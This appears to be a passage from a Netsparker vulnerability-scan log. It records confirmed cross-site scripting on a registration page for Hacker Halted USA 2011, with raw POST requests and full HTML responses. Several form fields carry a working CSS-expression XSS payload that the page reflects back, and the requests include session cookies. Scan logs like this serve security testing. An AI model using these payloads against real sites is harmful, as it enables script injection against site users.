Content-Type: multipart/form-data; boundary=d15954145c9249daa691495f4c773a8d
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=hdk20h7p3q3dh3vnofe8g6hfq7
Content-Length: 1329
Accept-Encoding: gzip, deflate

--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="action"

submit
--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="eventid"

19301
--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="categoryid"

65410
--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="language"

eng
--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="reference"

" stYle="x:expre/**/ssion(netsparker(9))
--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="eb"

3
--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="admin"

-1
--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="bridgeid"

3
--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="discountcode"

3
--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="selectcategoryid"

65410
--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="x"

0
--d15954145c9249daa691495f4c773a8d
Content-Disposition: form-data; name="y"

0
-----------------------------7db13e117a156e--
--d15954145c9249daa691495f4c773a8d--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:31:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=hp4huehd8ns87nk0ivb03puu25; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3099
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><!--Array( [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
input[email] POST netsparker@example.com
discountcode POST " stYle="x:expre/**/ssion(alert(9))
selectcategoryid POST 65410 -----------------------------7db109117a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=b5b8ca2928834925a18bb4668e0cb40b
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=hkjiqthimgtar1ggb4bansmjo6
Content-Length: 1163
Accept-Encoding: gzip, deflate

--b5b8ca2928834925a18bb4668e0cb40b
Content-Disposition: form-data; name="action"

submit
--b5b8ca2928834925a18bb4668e0cb40b
Content-Disposition: form-data; name="eventid"

19301
--b5b8ca2928834925a18bb4668e0cb40b
Content-Disposition: form-data; name="categoryid"

65410
--b5b8ca2928834925a18bb4668e0cb40b
Content-Disposition: form-data; name="language"

eng
--b5b8ca2928834925a18bb4668e0cb40b
Content-Disposition: form-data; name="reference"

3
--b5b8ca2928834925a18bb4668e0cb40b
Content-Disposition: form-data; name="eb"

3
--b5b8ca2928834925a18bb4668e0cb40b
Content-Disposition: form-data; name="admin"

-1
--b5b8ca2928834925a18bb4668e0cb40b
Content-Disposition: form-data; name="bridgeid"

3
--b5b8ca2928834925a18bb4668e0cb40b
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--b5b8ca2928834925a18bb4668e0cb40b
Content-Disposition: form-data; name="discountcode"

" stYle="x:expre/**/ssion(netsparker(9))
--b5b8ca2928834925a18bb4668e0cb40b
Content-Disposition: form-data; name="selectcategoryid"

65410
-----------------------------7db109117a156e--
--b5b8ca2928834925a18bb4668e0cb40b--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:31:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=7qemn5qo6o4nv2thusqqfp36u6; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3102
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><!--Array( [cat] => 1 [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST eng
reference POST 3
eb POST " stYle="x:expre/**/ssion(alert(9))
admin POST -1
bridgeid POST 3
input[email] POST netsparker@example.com
discountcode POST 3
selectcategoryid POST 65410
x POST 0
y POST 0 -----------------------------7db13e117a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=54eed6a300f84169ac47be78c34e8493
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=a4rgl26kgp32g4s6sgddio93e3
Content-Length: 1329
Accept-Encoding: gzip, deflate

--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="action"

submit
--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="eventid"

19301
--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="categoryid"

65410
--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="language"

eng
--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="reference"

3
--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="eb"

" stYle="x:expre/**/ssion(netsparker(9))
--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="admin"

-1
--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="bridgeid"

3
--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="discountcode"

3
--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="selectcategoryid"

65410
--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="x"

0
--54eed6a300f84169ac47be78c34e8493
Content-Disposition: form-data; name="y"

0
-----------------------------7db13e117a156e--
--54eed6a300f84169ac47be78c34e8493--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:31:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=mku7g0c1iropdpnqcosciloog6; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3099
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><!--Array( [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST eng
reference POST 3
eb POST 3
admin POST " stYle="x:expre/**/ssion(alert(9))
bridgeid POST 3
input[email] POST netsparker@example.com
discountcode POST 3
selectcategoryid POST 65410
x POST 0
